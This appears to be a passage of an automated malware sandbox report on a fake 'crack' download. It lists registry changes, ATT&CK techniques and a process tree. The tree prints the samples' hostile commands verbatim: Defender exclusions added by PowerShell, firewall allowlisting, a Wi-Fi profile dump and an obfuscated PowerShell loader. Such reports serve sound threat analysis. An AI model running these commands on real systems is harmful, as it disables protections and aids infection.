Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1 = 9800310000000000295990b9110050524f4752417e320000800009000400efbe874fdb49295990b92e000000c304000000000100000000000000000056000000000016005a00500072006f006700720061006d002000460069006c0065007300200028007800380036002900000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003700000018000000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 0100000000000000ffffffff	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	firefox.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
5544	PING.EXE
4596	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
7048	schtasks.exe
1428	schtasks.exe
6340	schtasks.exe
4784	schtasks.exe
1120	schtasks.exe
6372	schtasks.exe
7404	schtasks.exe
4680	schtasks.exe
7020	schtasks.exe
2324	schtasks.exe
3232	schtasks.exe
7836	schtasks.exe
4412	schtasks.exe
6416	schtasks.exe
7412	schtasks.exe
6012	schtasks.exe
4480	schtasks.exe
6556	schtasks.exe
6992	schtasks.exe
6352	schtasks.exe
2120	schtasks.exe
5460	schtasks.exe
5020	schtasks.exe
1120	schtasks.exe
6712	schtasks.exe
7344	schtasks.exe
5608	schtasks.exe
6272	schtasks.exe
6088	schtasks.exe
3824	schtasks.exe
4492	schtasks.exe
7952	schtasks.exe
8180	schtasks.exe
6164	schtasks.exe
5376	schtasks.exe
3600	schtasks.exe
6156	schtasks.exe
5468	schtasks.exe
7916	schtasks.exe
6508	schtasks.exe
1112	schtasks.exe
7508	schtasks.exe
7020	schtasks.exe
5596	schtasks.exe
6540	schtasks.exe
6312	schtasks.exe
6368	schtasks.exe
6156	schtasks.exe
796	schtasks.exe
6556	schtasks.exe
3212	schtasks.exe
3568	schtasks.exe
7016	schtasks.exe
6380	schtasks.exe
5092	schtasks.exe
544	schtasks.exe
6636	schtasks.exe
7512	schtasks.exe
7564	schtasks.exe
4328	schtasks.exe
7304	schtasks.exe
4548	schtasks.exe
6832	schtasks.exe
3960	schtasks.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1656	firefox.exe

Suspicious use of AdjustPrivilegeToken 53 IoCs

description	pid	Process
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe
Token: SeDebugPrivilege	1656	firefox.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe
1656	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4936 wrote to memory of 1656	4936	firefox.exe	103
PID 4936 wrote to memory of 1656	4936	firefox.exe	103
PID 4936 wrote to memory of 1656	4936	firefox.exe	103
PID 4936 wrote to memory of 1656	4936	firefox.exe	103
PID 4936 wrote to memory of 1656	4936	firefox.exe	103
PID 4936 wrote to memory of 1656	4936	firefox.exe	103
PID 4936 wrote to memory of 1656	4936	firefox.exe	103
PID 4936 wrote to memory of 1656	4936	firefox.exe	103
PID 4936 wrote to memory of 1656	4936	firefox.exe	103
PID 4936 wrote to memory of 1656	4936	firefox.exe	103
PID 4936 wrote to memory of 1656	4936	firefox.exe	103
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 2528	1656	firefox.exe	104
PID 1656 wrote to memory of 408	1656	firefox.exe	105
PID 1656 wrote to memory of 408	1656	firefox.exe	105
PID 1656 wrote to memory of 408	1656	firefox.exe	105
PID 1656 wrote to memory of 408	1656	firefox.exe	105
PID 1656 wrote to memory of 408	1656	firefox.exe	105
PID 1656 wrote to memory of 408	1656	firefox.exe	105
PID 1656 wrote to memory of 408	1656	firefox.exe	105
PID 1656 wrote to memory of 408	1656	firefox.exe	105

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\クラック.zip
1⤵
PID:4760

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4836

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4936
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {66768db9-eff4-4cc7-b925-2028ccc7bfba} 1656 "\\.\pipe\gecko-crash-server-pipe.1656" gpu
    3⤵
    PID:2528
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2376 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02d04a39-c5e8-4b3a-9155-8311e8edb060} 1656 "\\.\pipe\gecko-crash-server-pipe.1656" socket
    3⤵
    PID:408
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3080 -childID 1 -isForBrowser -prefsHandle 2940 -prefMapHandle 3172 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29135ffb-66d6-47a4-8538-0ab0a1fae19e} 1656 "\\.\pipe\gecko-crash-server-pipe.1656" tab
    3⤵
    PID:1420
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3772 -childID 2 -isForBrowser -prefsHandle 3728 -prefMapHandle 3732 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cae689b2-ef78-477a-b01e-b7f30916956d} 1656 "\\.\pipe\gecko-crash-server-pipe.1656" tab
    3⤵
    PID:4264
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4924 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 3552 -prefMapHandle 4896 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7a37042-dc63-4c4f-8f21-d1460751d084} 1656 "\\.\pipe\gecko-crash-server-pipe.1656" utility
    3⤵
    - Checks processor information in registry
    PID:5200
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5456 -childID 3 -isForBrowser -prefsHandle 5444 -prefMapHandle 5440 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6506fde6-7caf-41bf-bf59-ddf886ed2387} 1656 "\\.\pipe\gecko-crash-server-pipe.1656" tab
    3⤵
    PID:5704
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5468 -childID 4 -isForBrowser -prefsHandle 5460 -prefMapHandle 5452 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2e77057-bb02-4f20-81c6-afa7c076a2fb} 1656 "\\.\pipe\gecko-crash-server-pipe.1656" tab
    3⤵
    PID:5724
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5716 -childID 5 -isForBrowser -prefsHandle 5820 -prefMapHandle 5824 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {514d26b8-34f6-4a36-93c3-95a7ca8a12fc} 1656 "\\.\pipe\gecko-crash-server-pipe.1656" tab
    3⤵
    PID:5740
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6172 -childID 6 -isForBrowser -prefsHandle 6160 -prefMapHandle 6152 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2531bcff-5ab1-439d-b443-34c86d381099} 1656 "\\.\pipe\gecko-crash-server-pipe.1656" tab
    3⤵
    PID:4932
- - C:\Program Files (x86)\クラック.exe
    "C:\Program Files (x86)\クラック.exe"
    3⤵
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:1172
  - - C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe
      "C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe"
      4⤵
      PID:3488
  - - C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe
      "C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe"
      4⤵
      PID:4892
    - - C:\Recovery\WindowsRE\dwm.exe
        
        "C:\Recovery\WindowsRE\dwm.exe"
        5⤵
        
        PID:3320
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AJZt4VdcaU.bat"
        6⤵
        
        PID:7940
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:7016
  - - C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe
      "C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe"
      4⤵
      PID:4620
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6380
  - - C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe
      "C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe"
      4⤵
      PID:5976
    - - C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        5⤵
        
        PID:5112
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:3672
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM Exsample.exe
        6⤵
        Kills process with taskkill
        
        PID:6284
  - - C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe
      "C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe"
      4⤵
      PID:2240
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe" "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:4944
  - - C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe
      "C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe"
      4⤵
      PID:5260
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\de-DE\kosomk.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6224
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5532
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\fr-FR\schtasks.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7624
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Crashpad\attachments\Gandcrab5.0.3.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1568
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\en-US\5e710462c65fe899466e4fb7c1e33c9a.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6720
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5576
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\btxaibn5OU.bat"
        5⤵
        
        PID:5368
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:7820
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4596
  - - C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
      "C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe"
      4⤵
      PID:992
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        
        "Powershell.exe" -windowstyle minimized "$Teratism249 = Get-Content 'C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168' ; $Neglefilen=$Teratism249.SubString(69482,3);.$Neglefilen($Teratism249) "
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5420
  - - C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe
      "C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe"
      4⤵
      PID:5468
    - - C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe
        
